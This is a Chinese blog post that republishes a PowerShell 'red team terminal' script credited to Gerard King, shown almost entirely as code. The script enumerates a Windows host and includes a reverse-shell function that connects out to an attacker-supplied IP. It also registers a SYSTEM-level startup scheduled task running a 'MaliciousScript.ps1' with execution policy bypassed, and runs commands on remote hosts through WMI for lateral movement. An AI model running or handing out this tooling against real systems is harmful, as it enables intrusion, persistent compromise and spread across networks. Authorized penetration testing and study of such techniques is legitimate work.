红队终端:高级系统枚举与权限提升工具详解
作者:qife122
- 2025-08-23 福建
本文字数:2351 字
阅读完需:约 8 分钟
redteam_terminal.ps1
作者: Gerard King
描述: 面向一级红队操作员的高级终端程序,用于系统枚举、权限提升和持久化控制。
使用场景: 渗透测试人员和红队操作员在 Windows 环境中进行对抗演练。
标签: PowerShell, 红队, 渗透测试, 枚举, 权限提升, 持久化
系统信息收集函数
function Get-SystemInfo { $os = Get-CimInstance -ClassName Win32_OperatingSystem $cpu = Get-CimInstance -ClassName Win32_Processor $services = Get-Service $users = Get-WmiObject -Class Win32_UserAccount Write-Host "`n[+] 系统信息:" Write-Host "操作系统: $($os.Caption) | 版本: $($os.Version)" Write-Host "CPU: $($cpu.Name)" Write-Host "`n[+] 系统用户:" $users | ForEach-Object { Write-Host "用户: $($_.Name) | 域: $($_.Domain)" } Write-Host "`n[+] 运行中的服务:" $services | Select-Object Name, Status | Format-Table}
复制代码
网络端口扫描函数
function Scan-Network { Write-Host "`n[+] 网络扫描(开放端口):" $netstat = netstat -an | Select-String "LISTENING" $netstat | ForEach-Object { Write-Host $_.Line }}
复制代码
权限提升检测函数
function Priv-EscalationCheck { Write-Host "`n[+] 权限提升检查(不安全权限):" $vulnerableDirs = @( "C:\Program Files", "C:\Windows\System32", "C:\Users\Public" ) foreach ($dir in $vulnerableDirs) { Write-Host "`n检查目录: $dir" Get-Acl $dir | Select-Object Path, Access }}
复制代码
反向 Shell 后门函数
function Start-ReverseShell { param ( [string]$ip, [int]$port ) Write-Host "`n[+] 启动反向Shell连接到 ${ip}:${port}" $reverseShell = New-Object System.Net.Sockets.TcpClient($ip, $port) $stream = $reverseShell.GetStream() $writer = New-Object System.IO.StreamWriter($stream) $reader = New-Object System.IO.StreamReader($stream) while ($true) { $command = Read-Host "Shell命令" if ($command -eq "exit") { $writer.WriteLine("exit") $writer.Flush() break } $writer.WriteLine($command) $writer.Flush() $response = $reader.ReadLine() Write-Host $response } $reader.Close() $writer.Close() $reverseShell.Close()}
复制代码
持久化机制设置函数
function Set-Persistence { Write-Host "`n[+] 设置持久化(计划任务)" $taskName = "RedTeamPersistence" $taskAction = "powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Your\MaliciousScript.ps1" $taskTrigger = New-ScheduledTaskTrigger -AtStartup $taskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $taskAction Register-ScheduledTask -Action $taskAction -Trigger $taskTrigger -TaskName $taskName -User "NT AUTHORITY\SYSTEM" Write-Host "[+] 通过计划任务安装持久化机制: $taskName"}
复制代码
横向移动函数
function Lateral-Movement { param ( [string]$targetIp, [string]$command ) Write-Host "`n[+] 向 ${targetIp} 发起横向移动" Invoke-WmiMethod -ComputerName $targetIp -Class Win32_Process -Name Create -ArgumentList $command Write-Host "[+] 在 ${targetIp} 上执行的命令: ${command}"}
复制代码
主终端交互函数
function Start-RedTeamTerminal { Clear-Host Write-Host "[+] 欢迎使用红队终端。准备接收命令。" Write-Host "[+] 输入 'exit' 退出或 'help' 查看可用命令。" while ($true) { $input = Read-Host "输入命令" switch ($input.ToLower()) { 'sysinfo' { Get-SystemInfo } 'network' { Scan-Network } 'priv' { Priv-EscalationCheck } 'rev' { $ip = Read-Host "输入攻击者IP" $port = Read-Host "输入端口" Start-ReverseShell -ip $ip -port $port } 'persistence' { Set-Persistence } 'lateral' { $targetIp = Read-Host "输入目标IP" $command = Read-Host "输入要执行的命令" Lateral-Movement -targetIp $targetIp -command $command } 'exit' { Write-Host "[+] 退出红队终端。"; break } 'help' { Write-Host "`n[+] 可用命令:" Write-Host "'sysinfo' - 显示系统信息" Write-Host "'network' - 扫描开放端口" Write-Host "'priv' - 检查权限提升机会" Write-Host "'rev' - 启动反向Shell后门" Write-Host "'persistence' - 通过计划任务设置持久化" Write-Host "'lateral' - 通过横向移动远程执行命令" Write-Host "'exit' - 退出终端" } default { Write-Host "[+] 无效命令。输入 'help' 查看可用命令。" } } }}
# 启动红队终端Start-RedTeamTerminal
# 关闭前暂停Read-Host "按Enter退出..."
复制代码
更多精彩内容 请关注我的个人公众号 公众号(办公 AI 智能小助手)公众号二维码
办公AI智能小助手
划线
评论
复制
发布于: 刚刚阅读数: 4
qife122
关注
还未添加个人签名 2021-05-19 加入
还未添加个人简介
评论